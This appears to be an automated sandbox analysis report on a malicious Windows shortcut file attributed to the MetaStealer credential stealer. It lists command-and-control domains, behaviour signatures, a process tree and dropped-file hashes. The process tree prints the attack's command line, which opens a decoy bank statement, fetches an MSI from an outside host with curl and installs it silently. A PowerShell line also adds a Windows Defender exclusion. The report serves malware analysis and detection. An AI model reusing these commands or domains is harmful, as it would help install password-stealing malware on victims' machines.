Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-02-2025 15:52

General

  • Target

    95557e6d85da4e250b6be0e029e122a8.lnk

  • Size

    3KB

  • MD5

    95557e6d85da4e250b6be0e029e122a8

  • SHA1

    7320586d1c78aedb6f63f53c076b1ae742e4592a

  • SHA256

    a960dcc42ff2b360b3e95f86ffc9106d7a1fa10fc59e51666de0b46460c38627

  • SHA512

    b3f3e00057705d0775a9ed4929dc4e0c4260bcc7618ad8b6208b0eb447e06e03fe6aeb9d7ab1e0a96d6fdcede0f34533e0c6b0ba1128111f79794111d107b59f

Malware Config

Extracted

Family

metastealer

C2

kiyaqoimsiieeyqa.xyz

ssqsmisuowqcwsqo.xyz

ykqmwgsuummieaug.xyz

ewukeskgqswqesiw.xyz

cscqcsgewmwwaaui.xyz

cyoksykiamiscyia.xyz

okgomokemoucqeso.xyz

ikwacuakiqeimwua.xyz

aawcsqqaywckiwmi.xyz

aiqasksgmyeqocei.xyz

qgumcuisgaeyuqqe.xyz

eiesoycamyqqgcea.xyz

ywceswakicsqomqw.xyz

auaieuewouawygku.xyz

cmiascusccywowcs.xyz

uiqkkomkaceqacec.xyz

quqeciymqmkqccqw.xyz

ssqsauuuyyigouou.xyz

aogaakukuugqswcy.xyz

ucgwcwsuqsuwewgc.xyz

Attributes
  • dga_seed

    21845

  • domain_length

    16

  • num_dga_domains

    10000

  • port

    443

Signatures

  • Meta Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • MetaStealer payload 1 IoCs
  • Metastealer family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\95557e6d85da4e250b6be0e029e122a8.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start msedge https://www.fnb.co.za/downloads/public/FNB_PSB_OBEStatement.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\4a72437e-e417-48ea-87e3-ff36bea93508.msi http://hq-office.us/fork/setup.msi & C:\Users\Admin\AppData\Local\Temp\4a72437e-e417-48ea-87e3-ff36bea93508.msi /qn | Taskkill /f /im cmd.exe
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3148
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.fnb.co.za/downloads/public/FNB_PSB_OBEStatement.pdf
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3424
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff945346f8,0x7fff94534708,0x7fff94534718
          4⤵
            PID:3228
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
            4⤵
              PID:2868
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4412
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
              4⤵
                PID:2080
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                4⤵
                  PID:992
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                  4⤵
                    PID:2736
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
                    4⤵
                      PID:5024
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4036
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                      4⤵
                        PID:3628
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                        4⤵
                          PID:1084
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
                          4⤵
                            PID:3664
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
                            4⤵
                              PID:4216
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9751697422214094227,12853150189326536474,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2808 /prefetch:2
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3284
                          • C:\Windows\System32\curl.exe
                            curl -sLo C:\Users\Admin\AppData\Local\Temp\4a72437e-e417-48ea-87e3-ff36bea93508.msi http://hq-office.us/fork/setup.msi
                            3⤵
                              PID:1084
                            • C:\Windows\System32\msiexec.exe
                              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\4a72437e-e417-48ea-87e3-ff36bea93508.msi" /qn
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:772
                            • C:\Windows\System32\taskkill.exe
                              Taskkill /f /im cmd.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1352
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:3232
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3408
                            • C:\Windows\system32\msiexec.exe
                              C:\Windows\system32\msiexec.exe /V
                              1⤵
                              • Enumerates connected drives
                              • Drops file in Windows directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:224
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding CA4BD50C55608F9FEFBF46AA36DBEC57
                                2⤵
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:4176
                                • C:\Windows\SysWOW64\ICACLS.EXE
                                  "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-06b8d14c-68c1-44b5-8417-c9917a87c9da\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                  3⤵
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1900
                                • C:\Windows\SysWOW64\EXPAND.EXE
                                  "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                  3⤵
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:492
                                • C:\Users\Admin\AppData\Local\Temp\MW-06b8d14c-68c1-44b5-8417-c9917a87c9da\files\setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\MW-06b8d14c-68c1-44b5-8417-c9917a87c9da\files\setup.exe" /VERYSILENT /VERYSILENT
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3172
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\search.exe"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2296
                                  • C:\Windows\SysWOW64\systeminfo.exe
                                    systeminfo
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Gathers system information
                                    PID:4984

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              6a53cceb7a396402c1eccd08dbe38a73

                              SHA1

                              96e06029b79791df1b1a0a7cef7508a5c44d13c4

                              SHA256

                              31c8ba2ce8a088515e4feff78968e8916c759331b7428421a990cc349a208b51

                              SHA512

                              bda381d092d0272a19350a66533ec0fac2efccfd26fc87695a8270eb3d4abec01483b31dfae75ba3f128623454d471c9e948c44df478edbdb6b5a15377637036

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              a451e41e51facc395053e7b74c3490d0

                              SHA1

                              c866ac24af529f0265e99bd88529da46c9ff6dcc

                              SHA256

                              cc33bfdf9c856a2e9e9aa8eeddf9723a0396fad82b0dcae7a408bb4c84fdb584

                              SHA512

                              553489450d55d7adb9c859e521d0e46961490e54c533c826adc8c546ca0b51ecda82c159801bd060a291e724355c6d4fd2ee603ff65d4a15603f34f1472664fb

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                              Filesize

                              181B

                              MD5

                              ccb46631489a43cd2d4bf7946e933fb9

                              SHA1

                              5ff304400fadda2c56161a958472ddaaf75bad1f

                              SHA256

                              15ee5570d87264156945a850c8662db921d2142b3cb803064bfbb1ddf6a3d428

                              SHA512

                              f02d1f6d4847d9e9dc102d7051a78fc0099c1e3ba8a1a2a9b7185ac6cfd2e61bfeeaf251a5148558d54f401f602042673124bd00ecad7ba3e10198eb87248b30

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              6KB

                              MD5

                              04b025b9f9a5d1a11ff0234043557677

                              SHA1

                              57cf016b70281b046250b72822d459e5d75ce318

                              SHA256

                              6b96a339a733e8d1ab3851fd9485664781387c7d62296c678a5ce425f81f2248

                              SHA512

                              23994051efa17e0fe98acbaee77118c93f13ac44435eb56a826ac8e605030120d9273fe31d425eee25ef240cdff18f806583e18c828f197702c00be87504a103

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              6KB

                              MD5

                              6601d14b12df8d76d8f6d7b857956e28

                              SHA1

                              52b91b9b91790130802484fb5dd4a8178809b913

                              SHA256

                              df35be4b36d05459ccc84aaea495ab16fb08ca907bc9e89a7bef38b3a3d9e35a

                              SHA512

                              d0a6179455c890a2595b98b9a3ce8987c583ee7fb09b2adffc2118d9607675b676992fb3f9f7bf2a0b850472755da1f54921f30066ebb89b5b61917ee888f377

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                              Filesize

                              16B

                              MD5

                              206702161f94c5cd39fadd03f4014d98

                              SHA1

                              bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                              SHA256

                              1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                              SHA512

                              0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                              Filesize

                              16B

                              MD5

                              46295cac801e5d4857d09837238a6394

                              SHA1

                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                              SHA256

                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                              SHA512

                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                              Filesize

                              11KB

                              MD5

                              8a9cd48c348005e83199ed283cdb8d7a

                              SHA1

                              c19805f433f50bf737527440d73787a7eb64ee92

                              SHA256

                              1c18f629844802b66c506521330c0287536f0a6091172718313e1ebf1b478e94

                              SHA512

                              e5a35deb67c56da044247a12a44e34e9595ded016e9dba0ff0beb52f25e4246fd2e2e1c1b7d77f2103451dbb369b4ae36e87fafae3d8f5c30bed808787fb7137

                            • C:\Users\Admin\AppData\Local\Temp\4a72437e-e417-48ea-87e3-ff36bea93508.msi

                              Filesize

                              2.0MB

                              MD5

                              45a56a51bffca8d36b068af78dbc6aa6

                              SHA1

                              a694ba66def8d702feb337a234f0ab4e562efeda

                              SHA256

                              6984a8e300e9a3aee123a340299b813134c89bd7e4c91793321643e6ecdef9ae

                              SHA512

                              4b599573283efa10442645bc9da7a924f17407e369f80c15c8bb81e633e4d6c4a171391e4126292b1421aefcc2d702c305eb0e9f8a644d83f4f7acf09028c9da

                            • C:\Users\Admin\AppData\Local\Temp\MW-06b8d14c-68c1-44b5-8417-c9917a87c9da\files.cab

                              Filesize

                              1.7MB

                              MD5

                              df5cc7b5707ecf44d429585c625d5b7f

                              SHA1

                              a837d6b536151c31b412b81f06da995b746c02c1

                              SHA256

                              cce10adeed7eace3be7434312279923db0c3f79a71a48b985aca9e3c7d585a2e

                              SHA512

                              bca1581078da37ec204ba7c32410528908b3b701a83bf73659897387b20766e99d23aa9ad4830cc61a2e7a066394b4fbbe8fd2a3968580494a8c7f593ed2e0d1

                            • C:\Users\Admin\AppData\Local\Temp\MW-06b8d14c-68c1-44b5-8417-c9917a87c9da\msiwrapper.ini

                              Filesize

                              1KB

                              MD5

                              2fec4efdfe17c4b3ff21d963ed7dea66

                              SHA1

                              54c934290c0f6830f53cdf43514ca5042d1acc6a

                              SHA256

                              26069dda8accddc06d6608b41cd4b764767d205cc8d6991614879b02c2a9f7db

                              SHA512

                              f9a8ed5c9b9e066520844fd16665be85bc55ef38a616c8f7205b5eab437a317f44886c1f085c1b3021549bc7b96b46036aa7af6a00dcdcfc46a2e2690276e380

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tl3ph4hx.xqd.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Windows\Installer\MSI9A2D.tmp

                              Filesize

                              208KB

                              MD5

                              0c8921bbcc37c6efd34faf44cf3b0cb5

                              SHA1

                              dcfa71246157edcd09eecaf9d4c5e360b24b3e49

                              SHA256

                              fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

                              SHA512

                              ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

                            • memory/2296-195-0x00000000056E0000-0x0000000005746000-memory.dmp

                              Filesize

                              408KB

                            • memory/2296-219-0x0000000006310000-0x000000000632E000-memory.dmp

                              Filesize

                              120KB

                            • memory/2296-193-0x0000000004D70000-0x0000000004D92000-memory.dmp

                              Filesize

                              136KB

                            • memory/2296-194-0x0000000005670000-0x00000000056D6000-memory.dmp

                              Filesize

                              408KB

                            • memory/2296-190-0x0000000004790000-0x00000000047C6000-memory.dmp

                              Filesize

                              216KB

                            • memory/2296-229-0x00000000072E0000-0x00000000072E8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2296-205-0x0000000005750000-0x0000000005AA4000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/2296-206-0x0000000005D20000-0x0000000005D3E000-memory.dmp

                              Filesize

                              120KB

                            • memory/2296-207-0x0000000005D60000-0x0000000005DAC000-memory.dmp

                              Filesize

                              304KB

                            • memory/2296-209-0x000000006E610000-0x000000006E65C000-memory.dmp

                              Filesize

                              304KB

                            • memory/2296-208-0x0000000006D00000-0x0000000006D32000-memory.dmp

                              Filesize

                              200KB

                            • memory/2296-191-0x0000000004F40000-0x0000000005568000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/2296-220-0x0000000006D40000-0x0000000006DE3000-memory.dmp

                              Filesize

                              652KB

                            • memory/2296-221-0x00000000076A0000-0x0000000007D1A000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/2296-222-0x0000000007060000-0x000000000707A000-memory.dmp

                              Filesize

                              104KB

                            • memory/2296-223-0x00000000070C0000-0x00000000070CA000-memory.dmp

                              Filesize

                              40KB

                            • memory/2296-224-0x00000000072F0000-0x0000000007386000-memory.dmp

                              Filesize

                              600KB

                            • memory/2296-225-0x0000000007260000-0x0000000007271000-memory.dmp

                              Filesize

                              68KB

                            • memory/2296-226-0x0000000007290000-0x000000000729E000-memory.dmp

                              Filesize

                              56KB

                            • memory/2296-227-0x00000000072A0000-0x00000000072B4000-memory.dmp

                              Filesize

                              80KB

                            • memory/2296-228-0x00000000073B0000-0x00000000073CA000-memory.dmp

                              Filesize

                              104KB

                            • memory/3172-186-0x0000000010000000-0x0000000010738000-memory.dmp

                              Filesize

                              7.2MB